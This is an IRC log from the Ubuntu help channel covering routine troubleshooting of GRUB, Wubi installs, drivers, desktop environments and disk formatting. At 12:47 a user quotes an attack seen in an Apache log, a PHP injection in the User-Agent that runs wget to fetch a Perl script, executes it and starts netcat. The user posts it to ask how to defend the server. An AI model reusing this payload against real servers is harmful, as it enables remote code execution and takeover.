phox_erusul: haha, this must be like the 10th time you are helping me xD But i know what grub is, but how would i go about restoring it?11:51
erUSULphox_: https://wiki.ubuntu.com/Grub2 <<< has the details11:51
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banker247how to find out which port apache is using11:52
banker247on my local system11:52
phox_erusul: hm, okey. But since i am installing 10.04, i need the 10.04-livecd then? Or is is the same grub system on the previous livecd-version?11:53
erUSULphox_: karmic livecd should work...11:53
phox_erusul: okey ill look into that11:53
erUSULbanker247: apache uses 80 by default like any other web server11:53
Sadu_[PL]banker247: loook at /etc/apache2/ports.conf11:54
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Belisariushello guys11:55
vltbanker247: And to find out what it actually uses: `netstat -tulpen | grep apache`11:55
BelisariusI have a little problem with my ubuntu 10.4 - I installed it on windows using the wubi installer, but when I try to boot it I first see the purple loading screen and then only black and a djungle drum sound.11:57
Xgatessay I have gufw installed on another distro, I wanted a simple firewall using ufw and I have gtk2 themes on my box only running OpenBox and I have a .gtkrc-2.0 but gufw doesn't load any gtk2 themes, anyone know why? Here's my file: http://pastebin.com/2fWs3SRS11:57
nitianfirbug for chrome on ubuntu is asking for: this extension needs access to your history and your data on all web sites!! is it safe to give these privilleges ?11:57
lostsonXgates do you have a .gtkrc setup in your home dir ?11:57
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BelisariusAnd before anyone laughs, I'm complete new to ubuntu.11:58
Xgateslostson: this is a .gtkrc-2.0 file I have in my HOME --- http://pastebin.com/2fWs3SRS11:58
qtapestryBelisarius, It sounds like it is booting correctly, but not recognizing your video properly.11:58
Belisariuspossible that this is due to my two monitors?11:59
Xgateslostson: using that Firefox and other apps change and use the gtk theme I change to, but gufw doesn't11:59
darthow to solve gpg key error?11:59
qtapestryBelisarius, possible11:59
BelisariusI'm not sure, but would it help to unplug one monitor before booting ubuntu and then set everything up?12:00
phylockdart - sudo apt-key add <key>12:00
dartcan nyone tell me syntax for solvin gpg key error12:00
qtapestryBelisarius, It can't hurt. You must try it out12:00
dartcan nyone tell me syntax for solvin gpg key error....12:01
erUSUL!gpgerr second time | dart12:01
ubottuError: I am only a bot, please don't think I'm intelligent :)12:01
BelisariusOk, will do so later. First time I tried ubuntu I had some driver issues regarding sound and graphics. Seems like it got worst now on the second try.12:01
erUSUL!gpgerr | second time  dart12:01
ubottusecond time  dart: Getting GPG errors after adding custom repositories? Find the GPG keyword for the repository (it's 437D05B5 for the standard ones) and run « gpg --keyserver keyserver.ubuntu.com --recv-keys <key> && gpg --export --armor <key> | sudo apt-key add - »12:01
Xgateslostson: no idea?12:03
lostsonXgates: well if your other apps are using the correct theme then really no i dont have an idea unless you need to put something in that .gtkrc to make it work12:03
Pirate_Hunter /j #virtualbox12:04
testffhow do i run firefoxnightly builds ?12:04
nitianfirebug for chrome is asking for: this extension needs access to your history and your data on all web sites!! is it safe to give these privilleges ?12:04
testffand YES ,i mean RUN,, not install or use some obscure script12:04
Xgateslostson: ok12:04
lankenI have installed ubuntu via Wubi, so my ubuntu OS is on a ".disk" type disk image file12:07
EgyParadoxlanken: YEs.12:07
EgyParadoxlanken: Continue12:07
funcqshunsorry please dont ban me: is there a tumblr channel?12:08
lankenis there any way to reconfigure it to use a standard disk image type instead?  (.vdi, .vhd, .hdd ...) in order to boot it from virtualbox12:08
funcqshuni found it, it is #tumblrs12:08
Sadu[PL]Can you tell me what about graphic card drivers? I must install some drivers or not? Im using Toshiba a300 1G212:08
EgyParadoxlanken: Can't help.12:09
mgolischlanken: i think those images are just raw filesystem images or raw disk images, you could try vboxmanage clonehd on them to make a vdi out of them12:09
testffhow fu***** hard can this be12:11
lankenmgolisch: let me see if I understand--  in that case, I would have a copy of my wubi install that could boot in virtualbox, but any changes made when using virtualbox would not affect the original install.12:11
lankenmgolisch: it seems as though my best bet would be to start over with a traditional ubuntu install from a boot disk12:11
tomcati have a question regarding compiling partclone on ubuntu 10.0412:11
mgolischlanken: yeah if you make a new vdi out of that raw image, but then again it wont realy boot as the bootloader and kernels are on your windows disk12:12
mgolischlanken: atleast that was how it worked the last time i tried wubi12:12
tomcatmake: *** No targets specified and no makefile found.  Stop.12:12
tomcatmaybe it's a n00b question :)12:13
lankenmgolisch: is there a convenient way to install ubuntu to an ext3 partition without burning a disk?  I think my burner has given out.12:13
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NitzchONotAny idea how can i change my 'Login Screen' With a custom one ? Not just Background Image, but the dialog too in 10.04 ?12:13
IdleOne!usb | lanken12:15
ubottulanken: For information about installing Ubuntu from USB flash drives, see https://help.ubuntu.com/community/Installation/FromUSBStick - For a persistent live USB install, see: https://wiki.ubuntu.com/LiveUsbPendrivePersistent12:15
lankenIdleOne: thanks!12:15
wygrzmothi all12:16
IdleOne!hi | wygrzmot12:16
ubottuwygrzmot: Hi! Welcome to #ubuntu! Feel free to ask questions and help people out. The channel guidelines are at https://wiki.ubuntu.com/IRC/Guidelines . Enjoy your stay!12:16
lankenIdleOne: it looks like that page is saying that I can use wubi to create an ext3 install12:17
IdleOnelanken: wubi installs inside of windows as if it was a windows application.12:17
IdleOnelanken: it then offers the choice at boot time and you can uninstall it the same way you would any other windows application12:18
XgatesI have gufw on another distro and it doesn't load any gtk2 themes, anyone know why? Here's my file: http://pastebin.com/2fWs3SRS12:19
IdleOneXgates: ask in the other distro irc channel12:19
Xgatesit's a Ubuntu app that's why I'm asking here12:19
SirRedToothi have to take the dvd out and put it back in ~5 times for it to read it as a movie file12:20
IdleOneXgates: the problem is probably that the other distro is doing/not doing something the Ubuntu way causing gufw to not act the intended way12:20
lankenIdleOne: it is nice that wubi can install ubuntu inside of an NTFS partition.  I wish that it had the option to create a traditional install instead, on an ext3 partition.12:20
Xgateslostson: are you running Gnome and if so do you have .gtkrc-2.0 in your HOME, or is it .gtkrc? and could you paste it on pastebin for me? THANKS12:21
Junikszanyone knows how to use properly the VLC program in console? I mean, how can I stop it, Fastforward, back, and exit. and it offers a program called Cvlc.12:22
XgatesIdleOne: loading GTK themes is pretty standard with all Linux distros it's a GTK thing not a distro thing :p12:22
bluenodeI've installed it. It is now working fine12:22
sillysylHi everyone !12:23
NitzchONotAny idea how can i change my 'Login Screen' With a custom one ? Not just Background Image, but the dialog too in 10.04 ? :)12:23
Xgatesbut it looks like Ubunt might be doing something different12:23
sebsebsebNitzchONot: you can't12:23
sebsebsebNitzchONot: not with GDM 212:23
sillysylSomeone may help me ? I'm seeking for an app for Kubuntu/Ubuntu12:24
sebsebsebNitzchONot: so KDM or Slim instead :)12:24
JiggyI need help12:24
NitzchONotsebsebseb: so there's not any workaround ?12:24
XgatesIdleOne:  are you running Gnome and if so do you have .gtkrc-2.0 in your HOME, or is it .gtkrc? and could you paste it on pastebin for me? THANKS12:24
sebsebsebNitzchONot: not that I know of12:24
phylock!ask | Jiggy12:24
ubottuJiggy: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)12:24
incidenceHi, Any usage experiences of replicating filesystems on external hard-drives?12:25
NitzchONotsebsebseb: so the only way it's to switch to KDM, correct ?12:25
IdleOneXgates: .gtkrc-2.0 and it is one line of text12:25
sebsebsebNitzchONot: basically yeah, or Slim, or maybe LXDM12:25
sebsebsebNitzchONot: Slim is very customizable12:25
sillysylI'm looking for an app for managing a video collection, like Amarok or Rhythmbox but for video fiels instead of audios. Someone has an idea ?12:26
JiggyI need help uninstalling ubuntu. I did a fresh install, and now I cannot uninstall it.12:26
sebsebsebNitzchONot: nice themes on there site, and woudn't take much to make your own it seems according to the site.12:26
XgatesIdleOne: ok please paste it here... THANKS12:26
SirRedToothubuntu wont read my dvd untill i put out then in 7 - 8 times12:26
alketHow can I edit those Burg themes, I searched my desktop but could not find them, please help http://www.omgubuntu.co.uk/2010/01/make-grub-themes-beautiful-look-nicer.html12:26
Hello2Hello the visual effects stoped working out of the blue. When I try to enable them I get the following message: Desktop effects could not be enabled any Ideas of how I can fix the problem?12:26
IdleOneXgates: include ".gtkrc-2.0-gnome-color-chooser"12:26
sebsebsebNitzchONot: if you install from Ubuntu repo, it will give you the Debian theme, since Ubuntu is based on Debian, but  easy enough to change the theme,  see website for details12:26
IdleOneXgates: that is all it says12:26
NitzchONotsebsebseb: thanks for your time, i'll look in to it :)12:27
XgatesIdleOne: ok THANKS12:27
sebsebsebNitzchONot: I like KDM from the Ubuntu repo,  for a few reasons, but it does come with a nice theme by default :)12:27
IdleOneXgates: if you like I can msg you the 4 lines from that file12:27
sebsebsebNitzchONot: ok np12:27
JiggyCan anyone tell me how to uninstall linux from my PC for a clean install of windows 7?12:28
NitzchONotsebsebseb: consider im new in all that linux/ubuntu stuff.. kdm isnt it KDE? another 'desktop enviroment' for linux?12:28
NitzchONotif im not mistaken12:28
EgyParadoxNitzchONot: Nope.12:28
IdleOneJiggy: pop in your windows 7 cd and install12:28
Hello2Hello the visual effects stoped working out of the blue. When I try to enable them I get the following message: Desktop effects could not be enabled any Ideas of how I can fix the problem?12:28
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IdleOneJiggy: you will want to format the entire drive. the windows cd should offer that option. For more help with installing windows see ##windows12:29
EgyParadox!kdm |NitzhONot12:29
EgyParadox!kde |NitzhONot12:29
ubottuNitzhONot: KDE (http://kde.org) is the !desktop environment used natively in !Kubuntu. To install from Ubuntu: « sudo apt-get install kubuntu-desktop », or see http://help.ubuntu.com/community/InstallingKDE . See http://kubuntu.org for more information. For more information on KDE 4, see !kde412:29
papcyhello there12:29
papcyneed help12:29
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IdleOneJiggy: Please do not DCC chat without asking permission12:30
sebsebsebNitzchONot: yes its KDE12:30
papcyhow do i install windows applications?12:30
sebsebsebNitzchONot: and most KDE apps you can run inside Gnome as well12:30
IdleOnepapcy: ask your question12:30
sebsebseb!wine | papcy12:30
ubottupapcy: WINE is a compatibility layer for running Windows programs on GNU/Linux - More information: https://help.ubuntu.com/community/Wine - Search the !AppDB for application compatibility ratings - Join #winehq for application help - See !virtualizers for running Windows (or another OS) inside Ubuntu12:30
sylsylsylHi everyone !12:30
sebsebsebpapcy: np12:31
EgyParadoxsebsebseb: I through kdm is like xdm and gdm12:31
NitzchONotEgyParadox, thanks :)  sebsebseb,so basically i change to KDE from Gnome. yes ?12:31
sebsebsebEgyParadox: yes, but better than GDM 2 :)12:31
damiangood morning people of the ubuntu style operating system!12:31
JiggyThe windows 7 install tells me theres no harddrive installed during installation, and the command prompt shows no drive when trying to format.  Yet when I restart without the CD, ubuntu loads.12:31
sebsebsebNitzchONot: sudo apt-get install kdm and select it12:31
papcyIdleOne, i also installed an application but cant find it on my computer12:31
EgyParadoxNitzchONot: If you prefer KDE then use it, if you want GNOME then use it , its up to you.12:32
damianany idea how i would run get the system to run a script when a new user is created?12:32
damianwithout creating an overlaying 'adduser' command12:32
IdleOnepapcy: what application?12:32
sylsylsylI'm looking for an app for managing a video collection, like Amarok or Rhythmbox but for video fiels instead of audios. Someone has an idea ?12:32
NitzchONotEgyParadox: dont know that do i preffer actually, since im rly new commer from Windows :p12:32
icerootdamian: maybe weith the skeletion scripts12:32
icerootdamian: /etc/skel/12:32
sylsylsylI found JTheque movies, but it's still in development, and Miro, but it's not complete enough for me12:33
EgyParadoxNitzchONot: You can always try what desktop environment you want, GNOME , KDE, XFCE.12:33
EgyParadoxThen stick to any of them.12:33
papcyneeded an emulator to test run some java app12:33
ivan90112hello :)12:34
Jiggywhen ubuntu is installed, is its current drive letter still c: ?12:34
NitzchONotEgyParadox: doesnt they overwritte each other ? Like.. now i have GNOME and if i switch to KDE.. dont i loose the GNOME settings and stuff ?12:34
sillysylJiggy : no12:34
Jiggywhat is it?12:34
EgyParadoxNitzchNot: Nope.12:34
sillysylJiggy : you don't have the same concept of "drives" under Windows12:34
sillysylJiggy : *that under windows12:35
Jiggyhow do i format12:35
ivan90112I just knew that if empathy can join to irc hat12:35
EgyParadoxNitzchONot: you can choose KDE or GNOME session at the login screen.12:35
damianthe skeleton will automatically add those files into a new users profile?12:35
papcywas formerly using SDK S40 6th Edition12:35
sillysylJiggy : If you're using Ubuntu, try Gparted. But you have also very fine and simple command line tools like fdisk and parted12:35
papcyon windows12:35
NitzchONotEgyParadox: Oh i see! Thats great to hear it. (Read it even)12:35
damianahh, very nice iceroot; this will be very helpful12:35
ubottuWINE is a compatibility layer for running Windows programs on GNU/Linux - More information: https://help.ubuntu.com/community/Wine - Search the !AppDB for application compatibility ratings - Join #winehq for application help - See !virtualizers for running Windows (or another OS) inside Ubuntu12:35
Jiggyubuntu doesnt work at all. it fails to load12:36
damiannow the big question, anyone done any extensive work with Ubuntu/Linux on a Windows Domain?12:36
DNDis creating a gpg key really take this long?12:36
sylsylsylJiggy : what do you want to format and in which filesystem ?12:36
WurstiHi, I need help configuring my TV Card (DVB-C). I wikied a lot. couldn't help me. It would be nice if someone would qry me for help. It is: TV@nywhere pro analog.12:36
Jiggywhich filesystem is windows 712:36
Jiggyntfs or fat3212:37
DNDmine is ntfs12:37
DNDbut i think there's another FS its called exFAT?12:37
XgatesIdleOne: msg me 4 lines from that file? I thought it was just the one you showed me was all?12:37
damianeverything sub-Windows2000 is NTFS12:37
damianunless specifically told otherwise12:37
NitzchONotEgyParadox: One last question (I guess). When i choose a session at the login screen, lets say KDE, does the GNOME Desktop setting (Like wallpaper, my Conky script, items in the desktop) "Transfer" to KDE too?12:37
Sean_PaulAnyone know how to record a stream in VLC player?12:38
DNDthe good thing about this exFAT is it enables transfers more than 4gb12:38
sylsylsylJiggy : I think you can't use Ubuntu to create a NTFS file system12:38
EgyParadoxNitzchONot: I believe nope.12:38
EgyParadoxitems in the desktop not sure.12:38
sylsylsylSean_Paul : maybe with the extended file opening options12:38
Jiggyalright, now i tried putting the harddrive with ubuntu in my windows 7 pc to format it through windows, but windows doesnt recognize it.. how would i go about formatting it from a command prompt to install windows 712:38
EgyParadoxNitzchONot: I am not sure, I do not use KDE much.12:38
sylsylsylJiggy : which Ubuntu CD are you able to launch, even in command line ?12:39
damianJiggy, right click on My Computer, go to Manage, the bottom option in the left pane should be drive management or something similar -- make sure you have the correct drive and right click / format12:39
Jiggyim using the windows 7 cd for a command prompt12:39
NitzchONotEgyParadox: even XFCE.. or whatever options i have xD12:39
damianbut, what are you attempting to do Jiggy?12:39
sylsylsylJiggy : you may use parted or fdisk, I think they're everyt Ubuntu CD12:39
Jiggyget rid of ubuntu and install windows 712:40
damianare you in the Windows installer?12:40
sylsylsylJiggy is attempting to format his old ubuntu drive into a windows NTFS drive12:40
damianjust partition your drives manually, delete all partitions and start over12:40
Jiggyit wont let me delete the partitions12:41
Morten_hi :)12:41
damianyou're doing something wrong! :P12:41
Jiggymore than likely12:41
damianwhat's it saying?12:41
Jiggyone moment12:41
damianif you've booted from the Windows 7 disc, you can do anything to the drives because they aren't being used12:42
ClassicR_can you help me?12:42
ClassicR_how setup this theme? http://gnome-look.org/content/download.php?content=72357&id=1&tan=1222978312:42
Jiggywell i cant just type "format c:" lol12:42
damianare you at the prompt?12:42
Jiggyi just restarted12:42
damianyeah, just get into the normal installer / setup12:43
damiango through the steps and when it asks you where you want it, delete partitions12:43
damianit should be something like 'L' to delete, then confirm12:43
Jiggyim getting there12:43
damianhang on, shouldn't you be in #Windows7 .. :P12:43
damianyou're going against Ubuntu!12:43
Jiggyi didnt even install ubuntu, it was against my choice12:44
anigmaso I turned on my laptop today and found out that I have no sound anymore -- what could be wrong?12:44
Jiggynow i cant get rid of it12:44
wSoge I somehow destroyed my install of linux, I orignally had a dual booting win7 + winXP and then I installed linux too, grub took over. It worked fine, until I selected some kind of recovery partition causing grub to mess up. Now I am presented with "error: uknown filesystem." and "grub rescue>", anyone can help me fix it?12:45
SirRedToothhow can i force ubuntu to play a dvd i put in, because it doesnt seem to detect the files on it12:46
remoteCTRLhi guys!12:46
sniveriI have small question too :D12:46
remoteCTRLi have a fujitsu e780 here where ubuntu doesnt let me enable the wifi, any help appreciated12:46
damiananigma, tried turning the volume up? :P12:47
sniverisomeone tries to attack to my system: - - [14/Jun/2010:14:11:11 +0300] "GET /global.inc HTTP/1.1" 404 466 "-" "Ustupid MF is back <?system('wget -O /var/tmp/cb.txt;perl /var/tmp/cb.txt 80&;nc 80&');?> Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"12:47
remoteCTRL!dvd | SirRedTooth12:47
ubottuSirRedTooth: For multimedia issues, this page has useful information: https://help.ubuntu.com/community/RestrictedFormats - See also https://help.ubuntu.com/10.04/musicvideophotos/C/video.html - But please use free formats if you can: https://help.ubuntu.com/community/FreeFormats12:47
sniverihow can I make sure he cannot execute perl via apache?12:47
anigmadamian: duh. seems like I have lost my sound hardware for some reason12:47
SirRedToothremoteCTRL, but sometimes it plays, sometimes it doesnt. I have to take out and insert about 10 times for it to play12:47
SirRedToothreally strange12:48
damiansniveri, does /global.inc exist?12:48
remoteCTRLSirRedTooth: then i would say something s broken...12:48
SirRedToothremoteCTRL, hardware or software?12:48
Travis-42using sbackup with ubuntu, I check the "abort backup if destination directory does not exist" box, and save. I then exit and reload the configuration and the checkbox is no longer checked. Anyone encounter this?12:49
Azeotropecan you run Ubuntu on a very old computer (ie 486) and if yes, what version?12:49
damianAzeotrope, v0112:49
damiani put Debian on my 486/66MHz in about 2001 Azeotrope, it worked OK .. but took quite a while to load12:49
damiannow that was latest Debian with old system and it run like poop :P12:50
damianUbuntu hadn't been thought up then!12:50
sniveridamian, didn`t find one.. so it should be on root folder?12:50
sieSomething failed and ATI drivers aren't working. http://pastebin.ca/1882820 What to do now? ;-D12:50
damiancorrect, sniveri12:50
WXZ1does anyone know how to get the tomboy panel app on the panel without using "add to panel"12:50
damianif it doesn't exist, you have no/limited issues; it's probably a standard exploit, which you don't have12:50
damianif you're worried about *him* doing something, you might want to look at setting up a firewallto block him12:51
remoteCTRLSirRedTooth: hardware most likely12:51
SirRedToothremoteCTRL, the strange thing is, the fans for the optic drive fire up so i know it knows its in there12:51
livingdaylightHello good people of Ubuntu!12:52
damianwe aren't good!12:52
damianwe're the moderately ok12:52
sniveridamian, yep.. this "someone" tries to execute allkinds of stuff every day.. today it was that perl thing12:52
remoteCTRLSirRedTooth:  what fans??12:52
livingdaylightdamian: you are the Rohxers!12:53
damiansniveri, i'd be looking at firewalling him then12:53
JiggySo is there no way to format my harddrive from the windows 7 CD command prompt?12:53
SirRedToothremoteCTRL,  dont know but there are fans of some description lol... maybe its the hdd fans.. doesnt make sense but its the closest thing to the optical drive.12:53
damianno Jiggy, do it from within the installer12:53
DNDhi guys, how long does the gpg generates?12:54
DNDunder 256mb of memory12:54
Jiggythe windows installer is telling me that theres already an open setup, and to reboot without the CD.  when i reboot without the CD it goes directly to ubuntu.12:54
bluenodehaha it works!12:54
SirRedToothwoo it detected it... i can watch another 2 episodes of lost until i have to put it in and out about 50 times12:54
remoteCTRLSirRedTooth: youre right there, doesnt make much sense...12:54
damianrofl SirRedTooth12:55
Kauzmik1drSirRedTooth: Have you tried cleaning the DVD? Does your DVD read both + and - ?12:55
damiantried the drive in a non-Ubuntu environment to see if the issue is hardware / software related?12:55
bluenodeI hope that this error will not influence the system12:55
bluenodebut 10.04 is more responsive than 8.0412:55
SirRedToothKauzmik1dr, i have watched about 4 different dvd's all with the same problem. back over at.. windows *gasp* i never had that problem12:55
wSogehi i messed up my grub and now am presented with "grub rescue>" how can i fix this?12:56
Jiggyso how do i go about converting the fat32 filesystem to ntfs12:57
DNDwSoge can you try this?: http://ubuntuforums.org/showthread.php?t=132678812:57
DNDJiggy, formatting it?12:57
remoteCTRLwhats the cli commant to enable a wifi module?12:57
vltJiggy: copy data somewhere else, format it, copy back12:58
Jiggyokay, so what would i type in the command prompt to go about formatting it12:58
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DNDJiggy try this: http://support.microsoft.com/kb/30788112:58
DNDplease backup first before attemting12:58
DNDi barely know that there was a "convert" command :D12:59
PiciSurely this would be more appropriate for ##windows ?12:59
DNDi agree13:00
Jiggyim trying to uninstall ubuntu13:00
Jiggyand i cant13:00
DNDanyway i already gave the solution13:00
vltJiggy: mkfs.vfat13:00
Jiggyit didnt solve anything lol13:00
vltJiggy: Wait, you wanted ntfs ...13:00
DNDyou said you want to convert to ntfs?13:00
kuntaucan help me with installing ubuntu13:01
vltJiggy: There's ntfs-3g which can write _to_ an ntfs file system but I don't know whether you can initially format it. read `man ntfs-3g`13:01
DNDkuntau, boot from livecd13:01
kuntauhi DND13:02
DNDthen click on intall icon once you get to the desktop13:02
kuntaui installed ubuntu and it ask me to restart13:02
kuntauthen i can't see the boot menu13:02
DNDyes after the installation remove the cd13:02
Dr_Willis_!find mkfs.ntfs13:02
kuntauactually i want to dual boot with windows13:02
ubottuFile mkfs.ntfs found in ntfsprogs13:02
Jiggyim trying to do all of this from a command prompt13:02
DNDinstall windows first then ubuntu13:03
kuntauhow to i add ubuntu to boot menu13:03
iflemaJiggy the windows install media will wipe it away and format ntfs for you.13:03
Jiggyi cant install windows13:03
damianwhy are you still at the godddd damn prompt, Jiggy?!?!@?#!#13:03
kuntaui use EasyBCD13:03
damianmake out you have NOTHING on your drive13:03
damian.. install Windows13:03
kuntaunot sure which option to select13:03
Jiggythe windows setup wont load13:03
damianfresh install, ubuntu never existed, yo'll be fine13:03
vltJiggy: Ok, mkfs.ntfs is available (after installing ntfsprogs).13:03
Jiggyso all i have is a command prompt13:03
damianthen there's an issue with your disc13:03
DNDkuntau is it a windows boot menu or a ubuntu boot menu?13:04
damianas long as a drive is present, Windows will try and take it over13:04
Jiggyill type the error13:04
pozicThe wrong sound card is selected and it is also selected to use digital output, which is what I don't want, even if I do alsamixer, make the required changes, and do alsactl store as root it still doesn't work. How can I fix it such that it works even after a reboot?13:04
mmfbSo, from what I hear, Xubuntu is a simpler more beginner friendly version of Ubuntu. My question is, which version of Linux do you guys recommend for a new guy to Linux? I'm currently running Xubuntu 9.10.13:04
damiancheck your bios, make sure the drive is recognised13:04
kuntauright now i got dual boot.. winxp and win713:04
kuntaui want to add ubuntu13:04
kuntausupposed to use grup right?13:04
Jiggyim about to just buy another harddrive13:05
damiando it!13:05
kuntaunow using easyBCD I add ubuntu to boot menu13:05
damiancontact Microsoft support :P13:05
DNDit should use grub. try to read this: http://ubuntuforums.org/showthread.php?t=22045213:05
damian1300 microsoft13:05
vltmmfb: Ubuntu comes with different desktop environments. Default is GNOME, and then there's kubuntu with KDE, xubuntu with XFCE, lubuntu with LXDE.13:05
kuntauthen when i select ubuntu from boot menu i load me into grub13:05
vltmmfb: None of them is a "beginner" version13:05
kuntauit is grub command line i dont know what to type..13:05
DJ_HaMsTavlt, which one is better ?13:06
vltmmfb: XFCE tries to and LXDE actually is more lightweight than GNOME or KDE13:06
mmfbvlt: Beginner as in a simpler version. A bit more cleaned up from your standard Ubuntu desktop.13:06
vlt!better | DJ_HaMsTa13:06
ubottuDJ_HaMsTa: Usually, there is no single "best" application to perform a given task. It's up to you to choose, depending on your preferences, features you require, and other factors. Do NOT take polls in the channel. If you insist on getting people's opinions, ask BestBot in #ubuntu-bots.13:06
Jiggyloaded windows installer: upgrade is the only option, custom (advanced) is whited out13:06
=== Cain` is now known as Cain
Jiggyi hit upgrade13:07
tull_1i cannot install nvidia drivers on my ubuntu 10.0413:07
mmfbvlt: I also hear that Xubuntu is better for people with low spec computers. Since it's "cleaner" it runs smoother than Ubuntu.13:07
kuntaulooks like i have to reisntall ubuntu..13:07
vltDJ_HaMsTa: I personally prefer LXDE (instead of XFCE) for smaller machines13:07
tull_1i've tried with jockey-gtk13:07
tull_1but it says me that there are problems13:07
vltmmfb: I personally prefer LXDE (instead of XFCE) for smaller machines13:08
DamienRSAhey im new to ubuntu when i installed ubuntu 10.04 allongside xp it worked for a day but now when i switch my pc on it doesent show xp anymore! its gone? also if i click places it says 79gb file system but it has an error please help13:08
vltmmfb: But that may be a matter of taste ;-)13:08
kuntauYou'll probably notice that the GRUB menu only lists Ubuntu and Windows XP. DON'T PANIC! This is perfectly normal. If you choose Windows XP at the GRUB menu, it actually loads the Windows Boot Manager, where you can choose between Vista and XP.13:08
pushpopHi All, I just install ubuntu and I'm botting to the drive that I know I install to but when I reboot after installation it does not load up into Unbuntu?13:08
DJ_HaMsTavlt,  ah, so LXDE is like.. windows CE ?13:08
vltmmfb: You can install more than one DE on a machine and switch between them as you like13:08
kuntaufor me it only listed winxp and win713:08
tull_1anyone can help me?13:09
vltDJ_HaMsTa: I don't know Windows (CE)13:09
mmfbvlt: Yeah, but I'm really a newb at things like that, so I wouldn't know how.13:09
kuntauthis is so frustrating......13:09
DJ_HaMsTavlt, windows CE is for portable electronics.. like PDA's and GPS systems13:09
SnadderAnyone know how to configure custom rules for apparmor?13:09
pushpopHi All, I just installed ubuntu and I'm booting to the drive that I know I installed to but when I reboot after installation it does not load up into Unbuntu?13:10
kuntausame with me pushpop13:10
kuntaunow im stuck13:10
vltmmfb: When you install Ubuntu (doesn't matter from which media) you can install another DE later easily. Just select the package "lubuntu-desktop" for LXDE, "kubuntu-desktop" for KDE ...13:10
DamienRSAwhen i boot up i cant go into xp anymore?13:11
DJ_HaMsTaDamienRSA, did you install windows first ?13:11
VigoSnadder: https://wiki.ubuntu.com/AppArmor and https://help.ubuntu.com/community/AppArmor13:11
DamienRSAyes i had window for a long time13:11
mmfbI have two more questions. 1) How do you "uninstall" a program on Linux? 2) Does anyone here play EVE Online on Linux? And if so, can you walk me through the steps to get it running properly?13:12
Farkieapt-get remove program13:12
Dr_Willis_mmfb:  depends on how you insatlled it.  Most normally you use the package manager tools13:13
mmfbFarkie: "apt-get remove program" or "apt-get remove [insert program]"13:13
tull_1how can i install nvidia drivers with ubuntu 10.04?13:13
Farkielol, the latter13:14
Farkieyou can attempt the first13:14
Farkiefail miserably13:14
Vigommfb: CLI, Synaptic are clean.13:14
DamienRSAwhen i boot up it only lets me choose ubuntu but not xp how can i fix this?13:14
Dr_Willis_tull_1:  i use the 'hardware drivers' tool in the system -> admin menu normally13:14
mmfbVigo: Synaptic?13:14
=== ubuntu___ is now known as sylsylsyl
vltmmfb: To (un)install programs there are several tools. For the cmd line there's apt or the more advanced aptitude. In your graphical environment you'll find a tool to manage software packages. Just "unselect" it and apply it will be gone ...13:14
Dr_Willis_!manual | mmfb13:14
ubottummfb: The Ubuntu Manual will help you become familiar with everyday tasks such as surfing the web, listening to music and scanning documents. With an emphasis on easy to follow instructions, it is suitable for all levels of experience. http://ubuntu-manual.org/13:14
Vigo!synaptic | mmfb13:15
ubottummfb: synaptic is Ubuntu's Graphical Package Manager. For a good howto see https://help.ubuntu.com/community/SynapticHowto13:15
Farkiemmfb is it server or desktop?13:15
tull_1Dr_Willis_, i've tried it but it doesn't work for me13:15
tull_1Dr_Willis_, at the end of the installation it says me that the installation was wrong13:15
mmfbFarkie: Desktop13:16
Farkiethen read what vlt said13:16
=== jojolabel is now known as seblabel
Dr_Willis_tull_1:  i whould check the forums for your exact videocard/chipset - see if others have had success.13:16
Dr_Willis_tull_1:  or you could posibally use the drivers from nvidia.com but ive never had to use those in ages13:17
Josh__does anyone know how to make terminator start already split and running irssi13:17
tull_1Dr_Willis_, my card is Nvidia 8600M GT13:17
espen77anyone else having problem with empathy freezing...still showing people are online but they show you as offline?13:19
Dr_Willis_tull_1:  thats odd  that card should work with the normal drivers in the tools. You could try insalling the drivers via an apt-get command. but i dont know what ersion it needs13:19
jameschhello, has anyone here setup netatalk on Ubuntu for use as an apple Time Machine backup location?13:20
Jiggyty all for your help. im just gonna buy another harddrive13:21
=== seblabel is now known as jojolabel
Junikszhello, can i run Linux on 486?13:25
LjLJuniksz: generally speaking, yes, but i'm not sure the Linux kernel that comes with Ubuntu still supports it... it certainly doesn't support 386 anymore, but i'm not sure about 486.13:25
LjLJuniksz: anyway, it's unlikely that you'll be able to run Ubuntu or even one of its lighter-weight derivatives on a 486's hardware...13:26
LjLJuniksz: i'd consider some other distribution instead (though i don't have specific advice about that myself, try asking for opinions in #ubuntu-offtopic)13:26
Dr_Willis_Juniksz:  there are special MINI linux's out for older machines.13:26
Dr_Willis_Juniksz:  such as 'puppylinux' or 'dsl' or 'tiny core linux'13:27
rumbertJuniksz: how much disk & RAM?13:27
Junikszrumbert: 50mhz and 20mb ram i think13:27
Dr_Willis_Juniksz:  good luck getting any linux on sojmthing that small13:28
LjLhmm 20 megabytes is not a lot. although i think i have a debian running on 1613:28
Junikszjust because Linux is better than Win9513:28
llutzJuniksz: what do you expect that ancient piece of hardware to do?13:28
Dr_Willis_20mb of ram - is going to be very very tight13:28
Junikszthis is a very old laptop13:28
rumbertJuniksz: you can install using the debian/'alternative' installer in text mode.  I think you will need at least 200MB disk.13:28
Dr_Willis_Juniksz:  i installed ubuntu a long time ago to a Pent -I, 100mhz, with 128 mb of ram. the install took a few hours. :(13:29
LjLi'd forget about Ubuntu13:29
sburjan_hello. where is lcoated the OO instalation in Ubuntu 10.04 ?13:29
JunikszI have only 700mb harddisk13:29
Dr_Willis_Juniksz:  you might want to look into 'freedos' :)  or Minix. depending on your needs13:29
rumbertrumbert: install minimal then run 'aptitude' and you can see whether you can run X Windows, but you will not be able to install the default xorg package or it will be too large for your disk, I guess.13:30
Dr_Willis_Juniksz:  puppy linux MIGHT run on it. but that will be tight13:30
Junikszand puppy  linuxis better then Win95?13:30
Dr_Willis_a sharp stick in the eye is better then windoss9513:30
Dr_Willis_Juniksz:  you sure its  only 20mb of ram?13:30
LjLJuniksz: that's a matter of personal preference. what is "better" for you?13:30
rumbertJuniksz: if you can run X Windows, you can use for window managers: olvwm, fvwm, awm, some tiling window manager.  Maybe XFCE or LXDE.  Look at Frame Buffer (FB) apps.13:31
Junikszfor example: mp3blaster can play mp3 songs, but win95 is so slow and it cannot do13:31
DJ_HaMsTaHow can i keep ubuntu from locking after a specific amount of time ?13:31
ravibnHi! I installed ubuntu 10.04 LTS 64 desktop on my Dell Latitude e6510 inside windows It went dead what exactly is the problem ? how to fix ?13:31
zkriesseDJ_HaMsTa: Administration -> Settings -> Screensaver13:32
